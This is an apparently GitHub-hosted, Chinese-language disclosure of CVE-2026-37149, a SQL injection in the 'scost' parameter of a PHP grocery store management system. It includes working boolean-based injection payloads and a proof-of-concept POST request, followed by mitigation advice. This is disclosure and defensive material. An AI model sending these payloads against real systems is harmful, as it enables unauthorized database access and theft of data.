pateldhyeyit/CVE-2026-37149

CVE-2026-37149 GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0 中的 SQL 注入 概述 CVE ID: CVE-2026-37149 漏洞类型: SQL 注入 (CWE-89) 严重程度: 高 发现者: Dhyey Patel 描述 GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0 的 "/grocery/search_products.php" 中的 "scost" 参数存在 SQL 注入漏洞。 该应用程序在将用户提供的输入嵌入到 SQL 查询之前，未能正确进行验证。攻击者可以通过该易受攻击的参数注入精心构造的 SQL 表达式，并操纵后端数据库查询。 成功利用该漏洞可能会允许未经授权访问敏感数据库信息，并执行任意的 SQL 语句。 受影响的产品 产品: GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN 版本: v1.0 供应商仓库: https://github.com/anirudhkannanvp/GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN- 受影响的组件 - "/grocery/search_products.php" - POST 参数: "scost" 攻击类型 远程 供应商信息 由仓库所有者维护的开源项目： https://github.com/anirudhkannanvp 技术细节 该漏洞已通过基于布尔的 SQL 注入技术得到确认。 TRUE 条件 Payload -1 OR 3*2*1=6 AND 000483=000483 -- FALSE 条件 Payload -1 OR 3*2*0=6 AND 000483=000483 -- 应用程序的响应会根据注入条件的计算结果为 TRUE 或 FALSE 而有所不同，从而确认了 SQL 注入。 进一步的测试证实了 SQL 函数的成功执行，包括： SELECT database() 返回的数据库名称为： grocery 这证明了可以通过该易受攻击的参数执行任意的 SQL 查询。 概念验证 请求 POST /grocery/search_products.php HTTP/1.1 Host: localhost X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded scategory=1& scost=-1 OR 3*2*1=6 AND 000483=000483 -- & sitem_name=test& spid=1& submit=Search%20For%20products 结果 响应会根据注入的布尔条件发生变化，从而确认了 "scost" 参数中存在 SQL 注入。 影响 潜在的影响包括： - 数据库枚举 - 敏感信息泄露 - 身份验证绕过 - 数据提取 - 修改数据库记录 缓解措施 开发者应该： 1. 使用预编译语句。 2. 使用参数化的 SQL 查询。 3. 验证数字输入参数。 4. 实施服务器端输入验证。 5. 避免将用户控制的输入直接拼接到 SQL 语句中。 参考 OWASP SQL 注入 https://owasp.org/www-community/attacks/SQL_Injection MITRE CVE 计划 https://www.cve.org 致谢 发现和报告者： Dhyey Patel

标签：CISA项目, OpenVAS, PHP, PoC, 暴力破解, 漏洞复现